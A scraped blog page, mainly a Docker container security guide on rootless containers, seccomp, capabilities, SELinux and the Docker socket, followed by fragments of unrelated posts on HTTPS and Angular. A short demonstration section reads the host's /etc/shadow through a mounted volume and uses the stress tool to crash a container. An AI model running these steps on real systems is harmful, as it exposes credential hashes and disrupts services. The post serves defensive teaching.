<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijrTq2gSmT7_1-m1H-1IHrUyez2jpEQuJpxERLzwdLdaKyUkOUa0uDfK33HLEg3RbHKg2uC9ITxEL53YaAhQQ2x-ykyHfmJQRtfnFE1kZ55C27dcKvGcbrsWV56R9VBtHXynerzbLDpN8/s1600/3.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="625" data-original-width="982" height="406" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijrTq2gSmT7_1-m1H-1IHrUyez2jpEQuJpxERLzwdLdaKyUkOUa0uDfK33HLEg3RbHKg2uC9ITxEL53YaAhQQ2x-ykyHfmJQRtfnFE1kZ55C27dcKvGcbrsWV56R9VBtHXynerzbLDpN8/s640/3.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="margin: 0in;">
<span style="font-family: Georgia, Times New Roman, serif;"><br /></span></div>
<div style="margin: 0in;">
<span style="font-family: inherit;">Let's start with
docker architecture to understand why we do we say "isolation" is
important in docker security. If we look
at the below diagram, you could imagine how the kernel is positioned in docker architecture while comparing
traditional VM architecture. In VM architecture the individual VM process will
have it is own dedicated Kernel, but when it comes to docker architecture
this is not the case. Each container's process will share the same host Kernel
across the cluster. </span></div>
<div style="margin: 0in;">
<span style="font-family: inherit;"><br /></span></div>
<div style="margin: 0in;">
<span style="font-family: inherit;">This is one of the
reasons why "isolation" is important in docker security
terms. Let's take an example if one
container is damaged with attacker arbitrary code then eventually there is a
possibility</span></div>
<div style="margin: 0in;">
</div>
<div style="margin: 0in;">
<span style="font-family: inherit;"><span>of the vulnerability
breakout from the container to the host kernel. As the kernel is shared across the
container and the docker engine is positioned above the host kernel the attack
surface will be extended to break out to the other containers in the cluster
also. This is the risk the docker architecture poses in terms of sharing host
kernel across container processes.</span><span> </span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMOvFcjO51qrtjUWmN1zv9aA2VQiz1vPPChO27VDzo-sck9W6P9_21pI5feiR9Vejd17FF3QDvWBU0I5P_Zi2rd5Apz-Zjg3AaGZZjzbq9FVcJq3Nf54bROl7WxcpqeJ8zZ0Dg-WpwwS8/s1600/2.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="598" data-original-width="1069" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMOvFcjO51qrtjUWmN1zv9aA2VQiz1vPPChO27VDzo-sck9W6P9_21pI5feiR9Vejd17FF3QDvWBU0I5P_Zi2rd5Apz-Zjg3AaGZZjzbq9FVcJq3Nf54bROl7WxcpqeJ8zZ0Dg-WpwwS8/s640/2.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><span style="font-size: large;"><br /></span></div><div class="separator" style="clear: both; text-align: left;"><h2 style="clear: both; text-align: left;"><span style="font-size: large;">Rootless containers</span></h2><div><span style="font-size: large;"><br /></span></div><div class="separator" style="clear: both;"><span style="font-family: inherit;">Running your containers as a "Rootless container". It means running the entire container runtime as well as the containers without the root privileges.</span></div><div class="separator" style="clear: both;"><span style="font-family: inherit;"><br /></span></div><div class="separator" style="clear: both;"><span style="font-family: inherit;">In a normal scenario when a docker engine spins a new container process the default privilege</span></div><div class="separator" style="clear: both;"><span style="font-family: inherit;">the container that will be running is "root" privilege, though the default docker isolation</span></div><div class="separator" style="clear: both;"><span style="font-family: inherit;">practices limit the root user capabilities within the container but still the container</span></div><div class="separator" style="clear: both;"><span style="font-family: inherit;">will be running in an as the root user. In any case, if the container runtime is processed it could maximum </span></div><div class="separator" style="clear: both;"><span style="font-family: inherit;">impact to the container and also if the vulnerability breakout the vulnerability will have access to docker engine and host machine kernels.</span></div><div class="separator" style="clear: both;"><span style="font-family: inherit;"><br /></span></div><div class="separator" style="clear: both;"><span style="font-family: inherit;">Also, if we really look into the need for a running container in ROOT mode. Absolutely 90 % there is NO need to run the container in root mode. </span></div><div class="separator" style="clear: both;"><span style="font-family: inherit;"><br /></span></div><div class="separator" style="clear: both;"><span style="font-family: inherit;">Below are the potential threats of running container in ROOT mode</span></div><div class="separator" style="clear: both;"><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTG_mLqFL4a9f9YqubfYda-bUe22Y3wSI30_f-3D78ghVgdu0wGCu_ENt4Q-e5qLc7RdO8nXjzHlCu_SPlr6TYRlAAg2ThSHLNoaWs94C4BLJU3oekAO32GEhX5ZuP0Yj0QSOtIZ3YGnU/s517/rootless_containers.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="505" data-original-width="517" height="391" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTG_mLqFL4a9f9YqubfYda-bUe22Y3wSI30_f-3D78ghVgdu0wGCu_ENt4Q-e5qLc7RdO8nXjzHlCu_SPlr6TYRlAAg2ThSHLNoaWs94C4BLJU3oekAO32GEhX5ZuP0Yj0QSOtIZ3YGnU/w400-h391/rootless_containers.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: justify;"><br /></div></div><h3 style="clear: both; text-align: left;">Within the container</h3><div class="separator" style="clear: both;"><span style="font-family: inherit;">A compromised container runtime: </span><span style="font-family: inherit;">With root, context can perform any action inside the container including installing new software editing files, mount file system, modify permission, etc.,</span></div><h4 style="clear: both; text-align: left;"><br /></h4><h3 style="text-align: left;">Outside the container</h3><div class="separator" style="clear: both;"><span style="font-family: inherit;">In a compromised container, the vulnerability could:</span></div><div class="separator" style="clear: both;"><ul style="text-align: left;"><li><span style="font-family: inherit;"> Breakout the container and escalate permission to Host.</span></li><li><span style="font-family: inherit;"> Breakout the container to damage another container </span></li><li><span style="font-family: inherit;"> Breakout to docker engine and can make requests to the Docker API server.</span></li></ul></div><div class="separator" style="clear: both;"> </div><h3 style="text-align: left;"><u>How to exploit the root containers </u></h3><div><br /></div><div><div>Here I will show you how the container running with root mode can be exploited in simple ways.</div><div><br /></div><div>I've used <span style="color: #e69138;">Katacoda as a testing environment.</span></div><div><br /></div><div>As a first step to exploit, you can verify the container running mode as shown below.</div><div>In the below container I verified that container is running mode by running the "whoami" command</div><div>inside the container.</div><div><br /></div></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5lOdNzAMiqNNrc5YlLy9r7bI2JTkblZjrT8Uik-XG2EN4IkQAErNYqEpDWf-o3o7u41T7-0jVSccYX-_cKUgNfw9LZgTW3HDot6WE9gxLxuHFiorCcfnAGeEkmhfDkZIYTjmV6FJ2MgI/s897/Check_container_mode.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="179" data-original-width="897" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5lOdNzAMiqNNrc5YlLy9r7bI2JTkblZjrT8Uik-XG2EN4IkQAErNYqEpDWf-o3o7u41T7-0jVSccYX-_cKUgNfw9LZgTW3HDot6WE9gxLxuHFiorCcfnAGeEkmhfDkZIYTjmV6FJ2MgI/w640-h128/Check_container_mode.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /><br /></div><h4 style="clear: both; text-align: left;">Privilege escalation to host machine</h4><div class="separator" style="clear: both;">In the below steps, I've shown how privilege escalation happens from the docker container to the Docker host.</div><div class="separator" style="clear: both;">To simulate I've mounted the host machine filesystem as a volume into the container, then I run</div><div class="separator" style="clear: both;">the command "cat /host/etc/shadow". The output is listing the user's details of the host machine.</div><div><br /></div><div><br /></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcp0nCC9hfBtk3WHltuvX7AOuzDMWiLXTML29MqIuKqW58bWaHASSXpMBrniB-Tw6BvtJtP5z2oPPbr1xyMXrK6naDoS6bpLaAiPyEU2UlcU-za_DhztodSA5B94cNVQU2QB2aenvBJ2c/s1257/Root_user_escalation+mode.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="592" data-original-width="1257" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcp0nCC9hfBtk3WHltuvX7AOuzDMWiLXTML29MqIuKqW58bWaHASSXpMBrniB-Tw6BvtJtP5z2oPPbr1xyMXrK6naDoS6bpLaAiPyEU2UlcU-za_DhztodSA5B94cNVQU2QB2aenvBJ2c/w640-h302/Root_user_escalation+mode.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><h4 style="clear: both; text-align: left;">Small DoS attack within the container</h4><div><div>In the below step, I'll show a simple DoS attack exploitation within the docker container.</div><div>Here the container is running in a root user mode, hence it has the privilege to install any software's within the container. Taking advantage of that, I install the Debian package called "Stress", then using the "stress" package I make heavy load to container memory thereby bring down the container to "OOMKilled" mode. Successfully made the DoS exploit.</div></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9CbYHSGs7EvsBqV38IbPAe5Kxu5lGhfy8Wz23DXr3dMD94PR2bMOqxTZPG2Bq61QzoNGyDFvHTJ7RL04GMpDoryl81nmorTq4NsAm1CKvY4-3szta5wuoFPobZQ5ydIwwEin-0uxTQbQ/s837/RLS_Container-Dos.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="88" data-original-width="837" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9CbYHSGs7EvsBqV38IbPAe5Kxu5lGhfy8Wz23DXr3dMD94PR2bMOqxTZPG2Bq61QzoNGyDFvHTJ7RL04GMpDoryl81nmorTq4NsAm1CKvY4-3szta5wuoFPobZQ5ydIwwEin-0uxTQbQ/w640-h68/RLS_Container-Dos.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><h3 style="clear: both; text-align: left;"><u>How to run as a "Rootless container"</u></h3><div><u><br /></u></div><div><div>Here the some of the basic steps to consider running your container as a "rootless container"</div><div><br /></div><div>1. Update your YAML file (if using K8s) and the security context section to </div><div> "runAsNonRoot" : true</div><div><span style="white-space: pre;"> </span> "runAsUser" : 1000</div><div><span style="white-space: pre;"> </span> </div><div>2. Add a new non-root user in your docker file</div><div><br /></div><div>RUN groupadd --gid 1000 NONROOTUser && useradd --uid 1000 --gid 1000 --home-dir /usr/share/NONROOTUser --no-create-home NONROOTUser</div><div>USER NONROOTUser</div><div><br /></div><div>3. In case your container port is running in privileged port anything below 1024 for example port 80, please modify</div><div>to run in an unprivileged port (anything above 1024), for example, port 5000.</div></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><h2 style="clear: both; text-align: left;"><span style="font-size: large;">Rootless Docker Engine</span></h2><br />
<div>Running docker-engine or daemon in a NON-ROOT user context.</div><div><br /></div><div>In the above section, we saw "rootless container", here the other secure practice is to run your docker engine /host itself in a rootless mode.</div><div><br /></div><div>Docker recently introduced a "rootless docker-engine" as part of Docker version 19.03. Docker recommends</div><div>to run your container as rootless mode, however, this feature is still previewed mode and yet to </div><div>be used by many peoples.</div><div><br /></div><div>With the below command, you can check your docker engine is running in root mode or rootless mode.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqOrhjuvA3sWzwtB32wZeXB6pStYwXAW5G8U7F-h9m2mkhyf4AufNcttwzmbGfV1Poqdgy8-V9IRfvV7QhTXPVr6WkWiXsglDd_CSCDN-Q45zbtehWScl3fKuvgUloK_ZjLNiN_4_TdBI/s1120/docker_engine.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="96" data-original-width="1120" height="54" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqOrhjuvA3sWzwtB32wZeXB6pStYwXAW5G8U7F-h9m2mkhyf4AufNcttwzmbGfV1Poqdgy8-V9IRfvV7QhTXPVr6WkWiXsglDd_CSCDN-Q45zbtehWScl3fKuvgUloK_ZjLNiN_4_TdBI/w640-h54/docker_engine.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><h2 style="clear: both; text-align: left;"><span style="font-size: large;">Docker Seccomp Profile</span></h2><div><br /></div><div>Secure computing mode (second) is a Linux kernel feature.</div><div><br /></div><div><div><ul style="text-align: left;"><li>Seccomp acts like a firewall for systems (syscalls) from container to host kernel.</li><li>Sample list well known syscalls: MKDIR <> , REBOOT <>, MOUNT <>,KILL <>, WRITE <>.</li><li>Docker default Seccomp profile disables 44 dangerous system calls, out of 313 available in 64-bit Linux systems</li><li>As per Docker incident CVE’s list, most docker incidents are due to privileged Syscalls.</li><li>Docker default Seccomp profile provided whitelisted Syscalls most of the time NOT necessary for our product needs. It is recommended to have a product-specific custom seccomp profile by whitelisting only Syscalls used by our container.</li></ul></div></div><div><br /></div><div><br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK82itoNZ6skZq4BwLoRU1GeSw6BPKRuWNkZZmzhLhv3RUBpnHgTwcJYw3Ci5NRIAqcz1khTq_aFrSyBAGuaBnEHIAyom6CfDtwCdRRhswCnxBQY8dBovRlYxX41EXi3xgvUaTPMXhDCU/s1211/seccomp_profile.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="569" data-original-width="1211" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK82itoNZ6skZq4BwLoRU1GeSw6BPKRuWNkZZmzhLhv3RUBpnHgTwcJYw3Ci5NRIAqcz1khTq_aFrSyBAGuaBnEHIAyom6CfDtwCdRRhswCnxBQY8dBovRlYxX41EXi3xgvUaTPMXhDCU/w640-h300/seccomp_profile.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><h3 style="clear: both; text-align: left;">How to check Container Seccomp Profile</h3><div>We can verify your container runtime is enabled with default seccomp profile protection or not. Just go inside your container terminal mode and run the below command grep Seccomp /proc/$$/status ( as shown below)</div><div><br /></div><div>Seccomp value 2 means it is ENABLED</div><div>Seccomp value 0 means it is NOT enabled</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpN80RgCG3OWGUT14oOpoABYpOH-J31Qw06ZrIPccS2t-7zt576eB6NzS_kz8mP722joXKTnWaq4DX58vLEyHbDCRJUoS9zBYZK1BDcnGztg7Vu4Yp8mz6F1imacVaYv9EiWnkl18sgVk/s828/seccomp_profle.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="116" data-original-width="828" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpN80RgCG3OWGUT14oOpoABYpOH-J31Qw06ZrIPccS2t-7zt576eB6NzS_kz8mP722joXKTnWaq4DX58vLEyHbDCRJUoS9zBYZK1BDcnGztg7Vu4Yp8mz6F1imacVaYv9EiWnkl18sgVk/w640-h90/seccomp_profle.jpg" width="640" /></a></div><br /><div><br /></div><div><h2 style="text-align: left;"><span style="font-size: large;">Docker Limited Kernel capabilities</span></h2><div><br /></div><div>By default, Docker starts containers with a restricted set of capabilities. This provides</div><div>greater security within the container environment.</div><div><br /></div><div>It means though your container's process is running with a root mode, the Kernel capabilities</div><div>within the container are limited. Docker will allow only limited capabilities within the</div><div>container which the user process can execute. However, this default protection from docker </div><div>can be overridden if you run your container in a "privileged" mode.</div><div><br /></div><div>To understand better. If you log into your Linux host machine as a Root user then you will</div><div>have the below Linux kernel capabilities will be allowed.</div><div><br /></div><div>CAP_CHOWN, CAP_DAC_OVERRIDE, CAP_DAC_READ_SEARCH, CAP_FOWNER, CAP_FSETID, CAP_KILL, CAP_SETGID, CAP_SETUID, CAP_SETPCAP, CAP_LINUX_IMMUTABLE, CAP_NET_BIND_SERVICE, CAP_NET_BROADCAST, </div><div>CAP_NET_ADMIN, CAP_NET_RAW, CAP_IPC_LOCK, CAP_IPC_OWNER, CAP_SYS_MODULE, CAP_SYS_RAWIO, CAP_SYS_CHROOT, CAP_SYS_PTRACE, CAP_SYS_PACCT, CAP_SYS_ADMIN, CAP_SYS_BOOT, CAP_SYS_NICE, CAP_SYS_RESOURCE, CAP_SYS_TIME, CAP_SYS_TTY_CONFIG, CAP_MKNOD,</div><div> CAP_LEASE, CAP_AUDIT_WRITE, CAP_AUDIT_CONTROL, CAP_SETFCAP, CAP_MAC_OVERRIDE, CAP_MAC_ADMIN, CAP_SYSLOG</div><div> </div><div> </div><div>But the same root user enters into the docker container the most above kernel capabilities will </div><div>be dropped and only below restricted list of capabilities will be allowed. </div><div><br /></div><div>CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID, CAP_KILL, CAP_SETGID,</div><div>CAP_SETUID, CAP_SETPCAP,CAP_NET_BIND_SERVICE, CAP_NET_RAW,CAP_SYS_CHROOT,CAP_MKNOD, CAP_AUDIT_WRITE</div><div><br /></div><div><span style="color: #e06666;">DO NOT RUN CONTAINER IN – –PRIVILEGED MODE !!</span></div><div><span style="color: #e06666;"><br /></span></div><div>The privileged container can do almost everything that the host can do. </div><div>The --privileged flag gives all capabilities to the container, and it also lifts all the limitations enforced by the device cgroup controller. </div><div><br /></div></div><div>Using the below command you can verify whether your command is running in PRIVILEGED Mode or normal mode.</div><div><br /></div><div>If the command returns TRUE, it means the container is running in a PRIVILEGED mode.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEishT2GAQK9hGvmBnvioTPLVSvP5jIchTg7a4jmIq31uAlnZAt2yYrkNouEb0u__P9KrEOuIDGkA7i_I3jQ5YBuCHbzxSHpHOVM5kDDDj7tgwPXivfhaE3Z0rftJxNENm6Tx23Mw3DZu58/s863/priviliged_container.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="106" data-original-width="863" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEishT2GAQK9hGvmBnvioTPLVSvP5jIchTg7a4jmIq31uAlnZAt2yYrkNouEb0u__P9KrEOuIDGkA7i_I3jQ5YBuCHbzxSHpHOVM5kDDDj7tgwPXivfhaE3Z0rftJxNENm6Tx23Mw3DZu58/w640-h78/priviliged_container.jpg" width="640" /></a></div><div><br /></div><h3 style="text-align: left;">Run container with limited or NO Kernel capabilities</h3><div><br /></div><div>Absolutely, in normal scenarios, most of the Microservices running in a container does NOT need </div><div>all Kernel capabilities provided by Docker.</div><div><br /></div><div>Hence, the best practice is to DROP all capabilities and add only the required capabilities.</div><div><br /></div><div>This can be done from Kubernetes docker Yaml file security context configuration. In your security</div><div>context either DROP all capabilities. Example</div><div> </div><div> SecurityContext => Capabilities => drop : ALL</div><div> </div><div>Or add only the required capabilities. Example</div><div><br /></div><div> SecurityContext => Capabilities => add : ["NET_ADMIN", "SYS_TIME"]</div><div><br /></div><h2 style="text-align: left;"><span style="font-size: large;">Docker SE Linux Protection</span></h2><div><span style="font-size: large;"><br /></span></div><div><div>Docker SELinux controls access to processes by Type and Level to the containers. Docker offers two forms of SELinux protection: type enforcement and multi-category security (MCS) separation.</div></div><div><br /></div><div><div><ul style="text-align: left;"><li>SELinux is a LABELING system</li><li>Every process has a LABEL. Every File, Directory, and System object has a LABEL</li><li>SE Linux Policy rules control access between labeled processes and labeled objects.</li></ul><div><span style="color: #e06666;">!! To enable SE Linux in a container, your Linux host machine must have SE Linux enabled and running !!</span></div><div><br /></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieWBLUui2hteuPKt5zgJHCC81tERE0GfZGEWy-NW-5iDupUURLyYoxynP4xkJ8Hw1vCcCnH3CxfbbqxYKO3mzBIzuqFUxnZkXlgUiBb2LCk1Sudc1aL73wB55MoBZJ39cGfmwC916J8AQ/s1085/seLinux.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="689" data-original-width="1085" height="406" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieWBLUui2hteuPKt5zgJHCC81tERE0GfZGEWy-NW-5iDupUURLyYoxynP4xkJ8Hw1vCcCnH3CxfbbqxYKO3mzBIzuqFUxnZkXlgUiBb2LCk1Sudc1aL73wB55MoBZJ39cGfmwC916J8AQ/w640-h406/seLinux.jpg" width="640" /></a></div><br /><div><br /></div></div></div><h2 style="text-align: left;"><span style="font-size: large;">Docker UNIX Socket (/var/run/docker. Sock)</span> usage</h2><div><br /></div><div><div>There are approaches followed by developers to achieve container management related functionalities</div><div>they will mount the docker UNIT socket inside the container and using the docker socket they</div><div>will do achieve the container management functionalities implementations such as for collecting logs from all containers, creating a container, stop container...etc</div></div><div><br /></div><div><div><span style="color: #e06666;">BE CAUTIOUS WHEN YOU MOUNT THE DOCKER UNIX SOCKET INSIDE YOUR CONTAINER!</span></div></div><div><br /></div><div>It is a more dangerous combination of the Root context, container privileged mode, and UNIX socket mounted.</div><div><br /></div><div>Below is a sample scenario that mounts the docker UNIX socket inside the container for log management of all the containers running by the docker engine.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7bpOeGjsAGtA0KYhVKpyFuKzRLwE5hGWVCrrVC1LctdY0EGvSxubtjq9dWT-imXln3ndkl0EpVkwJnnA0E46X0Sscwe70ysngyutTFtkZ26EQcsoilUl27-vkSVB-hzRHFL1_1McinxA/s802/docker_socket_usage.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="635" data-original-width="802" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7bpOeGjsAGtA0KYhVKpyFuKzRLwE5hGWVCrrVC1LctdY0EGvSxubtjq9dWT-imXln3ndkl0EpVkwJnnA0E46X0Sscwe70ysngyutTFtkZ26EQcsoilUl27-vkSVB-hzRHFL1_1McinxA/w400-h316/docker_socket_usage.jpg" width="400" /></a></div><br /><div><br /></div><h2 style="text-align: left;"><span style="font-size: large;">Docker Network security </span></h2><div><span style="font-size: large;"><br /></span></div><div>Be cautious on how you expose the services inside the container to outside the cluster.</div><div><br /></div><div><ul style="text-align: left;"><li>Do NOT expose the container with External IP ( if there is NO explicit need to run in external IP)</li><li>When there is a need to expose with External IP ensure that the inbound connection is encrypted and listening in 443 port.</li><li>Always try to expose your services only with Cluster IP mode.</li><li>If there is a need to expose with Node Port, ensure that the inbound connection is encrypted and listening in 443 port</li></ul></div><h3 style="text-align: left;">Ingress and Egress rules:</h3><div><div>Control traffic to your services with Ingress and Egress network policies. </div><div><ul style="text-align: left;"><li>With strict ingress rules supported by Kubernetes you can restrict the inbound connections to your containers.</li><li>With strict egress supported by Kubernetes you can restrict the outbound connections from your connection to another network.</li></ul><div><br /></div><h2 style="text-align: left;"><span style="font-size: large;">Other Docker Security Practices</span></h2></div></div><div><span style="font-size: large;"><br /></span></div><div><ul style="text-align: left;"><li>Volume mount – as read-only</li><li>Ensure SSHD does not run within the containers</li><li>Ensure Linux host network interface is not shared with containers.</li><li>Having no limit on container memory usage can lead to issues where one container can easily make the whole system unstable in case a DoS attack happened</li><li>Don't mount system-relevant volumes (e.g. /etc, /dev, ...) of the underlying host into the container instance to prevent an attacker can compromising the entire system and not just the container instance.</li><li>Incase Docker daemon is available remotely over a TCP port. Ensure TLS communication.</li><li>Consider read-only filesystem for the containers.</li><li>Leverage secrets store/wallets instead of environment variables for sensitive data storage inside a docker container.</li></ul></div>Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com5tag:blogger.com,1999:blog-6523941902002289478.post-43625319469869649702021-07-08T10:32:00.002+05:302022-01-29T20:36:48.745+05:30Understand the Anatomy of how HTTPS works ( Asymmetric, Diffie-hellman, symmetric) : my way of representation<h3> Step 1 : Initial Handshake, Local CA validation and Asymmetric encryption establishment </h3>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjOHVOqKeGlOD5hT1atNSc3c_C-AjJ-wCecid5emkFeesgFC67xW2tRD1BZV6as06U7kJyJSjIJnErGXWEJv8nXB3jriwIUPE3aumiFh3nYg97QVcVyi2veJIBiiAVqAKyu8Za-V7pStwJEfsmUquChPVsyGRinZGnlghwNA95v31GjouujFYIUQA0d=s656" style="display: block; padding: 1em 0; text-align: center; clear: left; float: left;"><img alt="" border="0" width="600" data-original-height="541" data-original-width="656" src="https://blogger.googleusercontent.com/img/a/AVvXsEjOHVOqKeGlOD5hT1atNSc3c_C-AjJ-wCecid5emkFeesgFC67xW2tRD1BZV6as06U7kJyJSjIJnErGXWEJv8nXB3jriwIUPE3aumiFh3nYg97QVcVyi2veJIBiiAVqAKyu8Za-V7pStwJEfsmUquChPVsyGRinZGnlghwNA95v31GjouujFYIUQA0d=s600"/></a></div>
<br/>
<div class="separator" style="clear: both;">
<h3> Step 2 : Diffie-Hellman Key exchange</h3>
<a href="https://blogger.googleusercontent.com/img/a/AVvXsEgvCvbMTaUm4Ek3QV4jDCl15wJ7h822i7fhbTEhFdq3utPz0rKnUhSFvAq6xjhOIr5mX9I60w5X4LTPc2K5dGhei7ihT7J8gu91cjRMIEhv3Okt1lhGsy69nShRd6DPSpuLy2vetpP8cciFmXWYkrZbonC_0yw5_ovLX7nSAK5sbW5A8C06rCA4kjqm=s651" style="display: block; padding: 1em 0; text-align: center; clear: left; float: left;"><img alt="" border="0" width="600" data-original-height="475" data-original-width="651" src="https://blogger.googleusercontent.com/img/a/AVvXsEgvCvbMTaUm4Ek3QV4jDCl15wJ7h822i7fhbTEhFdq3utPz0rKnUhSFvAq6xjhOIr5mX9I60w5X4LTPc2K5dGhei7ihT7J8gu91cjRMIEhv3Okt1lhGsy69nShRd6DPSpuLy2vetpP8cciFmXWYkrZbonC_0yw5_ovLX7nSAK5sbW5A8C06rCA4kjqm=s600"/></a></div>
<div class="separator" style="clear: both;">
<h3> Step 3 : Switching from Asymmetric encryption to Symmetric encryption </h3>
<a href="https://blogger.googleusercontent.com/img/a/AVvXsEiZlowgSfJlMqyMYLyy7TM9lyzElU3NGAJasj4cGxLuOfxvWU8RX4EAdeSxK129VKBm6BZttdbFixX-CtoT0ujLxI0xlbGB15jANhKIFVFftc_IPb9Z7zQHfsKEwUyIQSwgutuOkxiBkhcu1gjRVYMFXgB9xCy7mNxmyYOkP7rkx_OfEWRCOEOSg-7I=s679" style="display: block; padding: 1em 0; text-align: center; clear: left; float: left;"><img alt="" border="0" width="600" data-original-height="611" data-original-width="679" src="https://blogger.googleusercontent.com/img/a/AVvXsEiZlowgSfJlMqyMYLyy7TM9lyzElU3NGAJasj4cGxLuOfxvWU8RX4EAdeSxK129VKBm6BZttdbFixX-CtoT0ujLxI0xlbGB15jANhKIFVFftc_IPb9Z7zQHfsKEwUyIQSwgutuOkxiBkhcu1gjRVYMFXgB9xCy7mNxmyYOkP7rkx_OfEWRCOEOSg-7I=s600"/></a></div>Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-10400215074165821382020-12-12T20:57:00.005+05:302022-01-29T20:50:38.883+05:30Custom HTTP interceptor hook to Intercept Iframe Window HTTP requests from Parent Window in Angular<p> As we all know, angular provides a default HTTP Interceptor as part of angular HTTP module. We can use this interceptor to intercept the HTTP requests. But this has a limitation of intercepting HTTP calls only from the current window object. </p><p>Recently I had a requirement to intercept the HTTP requests triggered from Iframe window object and add the intercept values from parent object. We tried with default angular HTTP interceptor object, as I initially expected it did not work. Because the default HTTP interceptor does not provide provision to intercept the iframe window object. </p><p>Hence, I've written a quick hook using JavaScript which will intercept all the HTTPRequests triggered from the Iframe object. </p><p>This will be a hook within the XMLHTTPRequest open object and the hook will stay permanent in the iframe object until the iframe window object itself completely destroyed. </p><p>Here is the custom hook you can add in your parent window object. You just have to inject the interceptor in the iframe load event.</p><p><br /></p><p><br /></p>
<script src="https://gist.github.com/ramkrivas/50365a66307b4adfd3d3eeedec50b093.js"></script>Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com5tag:blogger.com,1999:blog-6523941902002289478.post-82497543598714058752019-10-22T21:35:00.003+05:302022-04-24T21:12:37.999+05:30Kubernetes NFS encrypted communication: Kubernetes pod applications (as NFS client) and Linux based machine (as NFS server) – secure traffic using Tunnel Over SSHAs we all know, to encrypt NFS share traffic b/w NFS client and NFS server the couple of options are used in general are Kerberos Authentication with privacy (krb5p) Or Tunnel over SSH known as port forwarding.<br />
<br />
